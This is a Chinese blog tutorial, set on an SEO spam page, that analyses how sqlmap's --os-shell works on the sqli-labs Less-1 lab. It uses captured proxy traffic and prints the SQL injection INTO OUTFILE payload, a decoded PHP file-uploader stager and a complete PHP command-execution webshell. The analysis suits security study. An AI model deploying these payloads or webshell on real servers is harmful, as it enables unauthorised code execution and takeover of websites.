当前位置: 首页 > news >正文

一个新网站要怎么优化seo网站课程

一个新网站要怎么优化,seo网站课程,设计师在线设计平台,中文域名查询网站文章目录 sqlmap --os-shell选项原理解析原理解析总结 sqlmap --os-shell选项原理解析 以sqli第一关为例。 --os-shell 是 SQLMap 工具的一个参数,用于在成功注入数据库后,执行操作系统命令并获取其输出。 sqlmap -u "http://192.168.188.199/sq…

文章目录

  • sqlmap --os-shell选项原理解析
    • 原理解析
    • 总结

sqlmap --os-shell选项原理解析

以sqli第一关为例。

--os-shell 是 SQLMap 工具的一个参数,用于在成功注入数据库后,执行操作系统命令并获取其输出。

sqlmap -u "http://192.168.188.199/sqli-labs/Less-1/?id=1" --os-shell

image-20230930180012165

选择4,因为整个网站是php代码写的。

image-20230930180138600

选择2,自定义位置。这里选择网站的WWW目录下

image-20230930180253552

获取shell,执行命令即可。

image-20230930180315345

原理解析

在执行sqlmap命令的时候,将代理设置为本地的8080端口,目的是在bp中抓取sqlmap发送的数据包进行分析。

sqlmap -u "http://192.168.188.199/sqli-labs/Less-1/?id=1" --os-shell --proxy=http://127.0.0.1:8080

在抓到第一个数据包后关闭拦截,后续sqlmap发送的数据包都会在bp的历史记录里都有数据。

执行完整个–os-shell过程,在bp的HTTP history历史记录中也抓到了全部数据包,下面对数据包进行分析。

image-20230930182958209

在id后面所跟的参数是经过URL编码的,所有uTools中的工具进行解密。

image-20230930183134944

解码后的语句

-9725' OR 4844=4844 LIMIT 0,1 INTO OUTFILE 'C:/phpstudy_2016/WWW/tmpuxxig.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d433a5c5c70687073747564795f323031365c5c5757575c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- - 

但是发现在LINES TERMINATED BY后面还有一段十六进制数,继续解码获取真实的数据。

image-20230930183303214

发现是一段php代码,代码整理如下:

<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";
}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=C:\\phpstudy_2016\\WWW\\> <input type=submit name=upload value=upload></form>";
}
?>

根据上面的mysql语句,是利用into outfile …LINES TERMINATED BY语句写个用于上传文件的tmpuxxig.php

–os-shell的本质就是写入两个php文件,其中的tmpuxxig.php可以让我们上传文件到网站路径下,如下图。

image-20230930195811136

然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbeabi.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。

image-20230930200304211

继续查看HTTP history历史记录数据包

image-20230930194714426

发现这个数据包是通过POST方法上传了一个tmpbeabi.php

image-20230930201633174

文件的内容经过整理后如下:

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)) {$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);} else {$z=array();}$c=$c." 2>&1\n";function f($n) {global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")) {ob_start();system($c);$w=ob_get_clean();} elseif(f("proc_open")) {$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])) {$w.=fread($t[1],512);}@proc_close($y);} elseif(f("shell_exec")) {$w=shell_exec($c);} elseif(f("passthru")) {ob_start();passthru($c);$w=ob_get_clean();} elseif(f("popen")) {$x=popen($c,r);$w=NULL;if(is_resource($x)) {while(!feof($x)) {$w.=fread($x,512);}}@pclose($x);} elseif(f("exec")) {$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);} else {$w=0;}echo"<pre>$w</pre>";
?>

这是一个用于命令执行的代码,命令执行后会将执行的结果输出。

image-20230930200304211

最后可以在C:\phpstudy_2016\WWW目录下找到生成的两个后门文件。

image-20230930200111143

总结

sqlmap的–os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。

sqlmap --os-shell 的使用需要以下条件:

  1. 知道网站的物理路径。

  2. 网站路径具有写入的权限。

http://www.tj-hxxt.cn/news/11283.html

相关文章:

  • 网站排名代做济南网站建设老威
  • 网站上传后怎么访问外包公司被辞退有补偿吗
  • 新冠最新消息实时数据滕州seo
  • 怎么查看网站虚拟空间企业网站营销的实现方式
  • 如何做简洁网站网站制作大概多少钱
  • 合肥装饰公司前十名seo搜索排名优化方法
  • 网页设计属于ui范围吗东莞市网络seo推广服务机构
  • 内容网站最新好用的cms网页制作成品
  • 广西电网公司电网建设分公司seo网络营销案例分析
  • 推荐西安优秀的响应式网站建设公司百度服务中心人工客服
  • 做外挂的网站百度站长平台账号购买
  • 建筑企业招聘信息seo描述快速排名
  • 快速搭建网站视频百度app下载官方免费最新版
  • 网站生成工具seo软文是什么
  • 观澜专业做网站公司关键词优化上海
  • 如何查看域名以前是做什么网站的好用的搜索引擎有哪些
  • 百度和阿里哪个厉害做网站深圳百度首页优化
  • 网站后台信息管理怎么做永久免费google搜索引擎
  • 网站目录提交搜索热门关键词
  • 中信建设有限责任公司海外地位百度seo优化推广公司
  • 政府形象建设 网站更新佛山网站建设十年乐云seo
  • 单位做网站有哪些做seo的公司
  • 做58网站怎么赚钱网络营销岗位职责和任职要求
  • 福州网站设计培训百度联盟是什么
  • 百度网站建设是什么恩城seo的网站
  • 室内设计培训网站seo专业学校
  • 做网站需要买什么东西淘宝网站的推广与优化
  • 施工企业在施工过程中发现设计文件和图纸有差错的专业百度seo排名优化
  • 山东查询网站备案公司员工培训内容有哪些
  • 信誉好的网站建设重庆森林经典台词 凤梨罐头